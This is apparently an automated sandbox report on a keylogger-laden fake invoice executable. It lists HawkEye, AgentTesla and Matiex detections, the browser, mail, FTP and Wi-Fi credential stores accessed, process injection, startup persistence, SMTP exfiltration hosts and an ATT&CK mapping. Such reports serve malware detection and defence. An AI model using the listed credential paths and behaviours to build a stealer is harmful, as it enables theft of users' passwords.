Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Process created: C:\Windows\SysWOW64\netsh.exe 'netsh' wlan show profile
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Local\Temp\origigoods20.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Yara detected WebBrowserPassView password recovery tool
                            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 27.2.hawkgoods.exe.a49c0d.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: origigoods40.exe PID: 6172, type: MEMORY

                            Remote Access Functionality:

                            Detected HawkEye Rat
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: RegAsm.exe, 00000005.00000003.281965972.0000000003BE0000.00000004.00000001.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
                            Source: hawkgoods.exe | String found in binary or memory: HawkEyeKeylogger
                            Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exe | String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp | String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp | String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp | String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
                            Source: hawkgoods.exe, 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp | String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmp | String found in binary or memory: q'&HawkEye_Keylogger_Execution_Confirmed_
                            Source: hawkgoods.exe, 00000006.00000002.387343775.0000000002A21000.00000004.00000001.sdmp | String found in binary or memory: q#"HawkEye_Keylogger_Stealer_Records_
                            Yara detected AgentTesla
                            Source: Yara match | File source: 00000005.00000003.273863512.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.285132773.0000000003DE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001F.00000000.423374232.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.425880345.0000000003A2D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000007.00000002.445463818.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000A.00000002.430720019.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.269169616.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001C.00000002.696128013.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000007.00000002.455680542.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001C.00000000.419299258.0000000000E22000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.272090410.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.414221299.00000000036C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.276618597.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.286093751.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001F.00000002.703454217.0000000002F71000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.418225668.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.418385560.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.427152213.00000000039C1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000007.00000000.273140883.0000000000C32000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000A.00000000.281843308.00000000000E2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.428390015.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001F.00000002.681903640.0000000000722000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000000A.00000002.454660209.0000000002801000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.284634932.0000000003E4D000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000008.00000002.699392963.000000000352E000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.419784850.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.413803172.0000000000E23000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000003.424187770.000000000372B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.271788096.00000000010E3000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000003.283633869.0000000003B4B000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: origigoods40.exe PID: 6172, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods20.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\origigoods40.exe, type: DROPPED
                            Source: Yara match | File source: 7.0.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 28.2.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 31.2.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 10.0.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 10.2.origigoods20.exe.e0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 28.0.origigoods40.exe.e20000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 7.2.origigoods40.exe.c30000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 31.0.origigoods20.exe.720000.0.unpack, type: UNPACKEDPE
                            Yara detected HawkEye Keylogger
                            Source: Yara match | File source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara match | File source: dropped/hawkgoods.exe, type: DROPPED
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPED
                            Source: Yara match | File source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.0.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.2.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 27.2.hawkgoods.exe.31d8e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 6.2.hawkgoods.exe.2a48e20.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Yara detected Matiex Keylogger
                            Source: Yara match | File source: 00000008.00000002.681623451.0000000000F72000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORY
                            Source: Yara match | File source: 0000001E.00000002.681849072.0000000000BD2000.00000002.00020000.sdmp, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4888, type: MEMORY
                            Source: Yara match | File source: Process Memory Space: PO_Invoices_pdf.exe PID: 5372, type: MEMORY
                            Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\Matiexgoods.exe, type: DROPPED
                            Source: Yara match | File source: 8.2.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 30.0.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.2.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 30.2.Matiexgoods.exe.bd0000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.0.Matiexgoods.exe.f9277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 8.0.Matiexgoods.exe.f70000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 30.2.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 30.0.Matiexgoods.exe.bf277c.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.4095c7.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.4095c7.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.40afcc.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 26.2.RegAsm.exe.4031bf.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4156d80.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4398f3f.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.40a9510.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 23.2.I$s#$lT3ssl.exe.3e69510.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara match | File source: 0.2.PO_Invoices_pdf.exe.4396d80.5.raw.unpack, type: UNPACKEDPE
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B60E9E bind,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B60A8E listen,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B60E6B bind,
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe | Code function: 6_2_04B60A50 listen,

                            Mitre Att&ck Matrix

                            Techniques are listed per tactic column of the matrix (trailing digits are the report's per-technique counters, kept as extracted):

                            Initial Access: Replication Through Removable Media1; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
                            Execution: Windows Management Instrumentation231; Native API2; Shared Modules1; Command and Scripting Interpreter1; PowerShell2; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
                            Persistence: Startup Items1; DLL Side-Loading1; Registry Run Keys / Startup Folder12; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                            Privilege Escalation: Startup Items1; DLL Side-Loading1; Access Token Manipulation1; Process Injection411; Registry Run Keys / Startup Folder12; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
                            Defense Evasion: Disable or Modify Tools211; Deobfuscate/Decode Files or Information11; Obfuscated Files or Information41; Software Packing13; DLL Side-Loading1; Masquerading1; Virtualization/Sandbox Evasion16; Access Token Manipulation1; Process Injection411; Hidden Files and Directories1
                            Credential Access: OS Credential Dumping2; Input Capture211; Credentials in Registry2; Credentials In Files1; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
                            Discovery: Peripheral Device Discovery1; File and Directory Discovery1; System Information Discovery126; Query Registry1; Security Software Discovery251; Virtualization/Sandbox Evasion16; Process Discovery2; Application Window Discovery1; Remote System Discovery1; System Network Configuration Discovery1
                            Lateral Movement: Replication Through Removable Media1; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
                            Collection: Archive Collected Data11; Data from Local System2; Email Collection1; Input Capture211; Clipboard Data1; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
                            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
                            Command and Control: Ingress Tool Transfer2; Encrypted Channel12; Non-Standard Port1; Remote Access Software1; Non-Application Layer Protocol2; Application Layer Protocol23; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
                            Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
                            Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
                            Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

                            Behavior Graph

                            Behavior Graph ID: 347154 | Sample: PO_Invoices_pdf.exe | Startdate: 02/02/2021 | Architecture: WINDOWS | Score: 100

                            Process tree recovered from the graph (node numbers are the graph's node ids; "started" edges give the parent):

                            Start: DNS/IP: smtp.privateemail.com | Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Capture Wi-Fi password; 20 other signatures
                              10 PO_Invoices_pdf.exe: dropped C:\Users\user\...\PO_Invoices_pdf.exe.log (ASCII) | Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                                16 RegAsm.exe: dropped C:\Users\user\AppData\...\origigoods40.exe (PE32), C:\Users\user\AppData\...\origigoods20.exe (PE32), C:\Users\user\AppData\...\Matiexgoods.exe (PE32)
                                  26 hawkgoods.exe: 3 other IPs or domains | Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 3 other signatures
                                    46 vbc.exe: Signatures: Tries to steal Instant Messenger accounts or passwords; Tries to steal Mail credentials (via file access)
                                    49 dw20.exe: dropped C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
                                    52 WerFault.exe: dropped C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
                                    54 vbc.exe
                                  30 Matiexgoods.exe: DNS/IP: checkip.dyndns.org; 2 other IPs or domains | Signatures: Tries to steal Mail credentials (via file access); Tries to harvest and steal browser information (history, passwords, etc); Tries to harvest and steal WLAN passwords
                                    56 netsh.exe
                                      66 conhost.exe
                                  32 origigoods20.exe: DNS/IP: smtp.privateemail.com 199.193.7.228, ports 49740, 49741, 49742 (NAMECHEAP-NETUS, United States) | Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
                                  34 origigoods40.exe
                                19 powershell.exe: dropped C:\Users\user\AppData\...\I$s#$lT3ssl.exe (PE32), C:\Users\...\I$s#$lT3ssl.exe:Zone.Identifier (ASCII) | Signatures: Drops PE files to the startup folder; Powershell drops PE file
                                  36 conhost.exe
                              14 I$s#$lT3ssl.exe
                                22 RegAsm.exe: dropped C:\Users\user\AppData\Local\...\hawkgoods.exe (PE32)
                                  38 hawkgoods.exe: DNS/IP: 69.170.12.0.in-addr.arpa | Signatures: 3 other signatures
                                    58 vbc.exe
                                    60 vbc.exe: Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                                    62 dw20.exe: dropped C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
                                    64 WerFault.exe: dropped C:\ProgramData\Microsoft\...\Report.wer (Little-endian)
                                  40 origigoods20.exe: Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to harvest and steal ftp login credentials
                                  44 (2 other processes): DNS/IP: checkip.dyndns.org; 216.146.43.70, ports 49777, 49779, 49787 (DYNDNSUS, United States)
                                24 powershell.exe
                                  42 conhost.exe

                            Screenshots

                            Thumbnails


                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            Source | Detection | Scanner | Label
                            PO_Invoices_pdf.exe | 18% | ReversingLabs | ByteCode-MSIL.Trojan.Pwsx
                            PO_Invoices_pdf.exe | 100% | Joe Sandbox ML |

                            Dropped Files

                            Source | Detection | Scanner | Label
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe | 100% | Avira | TR/Spy.Gen8
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Avira | TR/AD.MExecute.lzrac
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Avira | SPR/Tool.MailPassView.473
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe | 100% | Avira | TR/Spy.Gen8
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 100% | Avira | TR/Redcap.jajcu
                            C:\Users\user\AppData\Local\Temp\origigoods40.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\I$s#$lT3ssl.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Local\Temp\hawkgoods.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Local\Temp\origigoods20.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 100% | Joe Sandbox ML |
                            C:\Users\user\AppData\Local\Temp\Matiexgoods.exe | 46% | Metadefender |
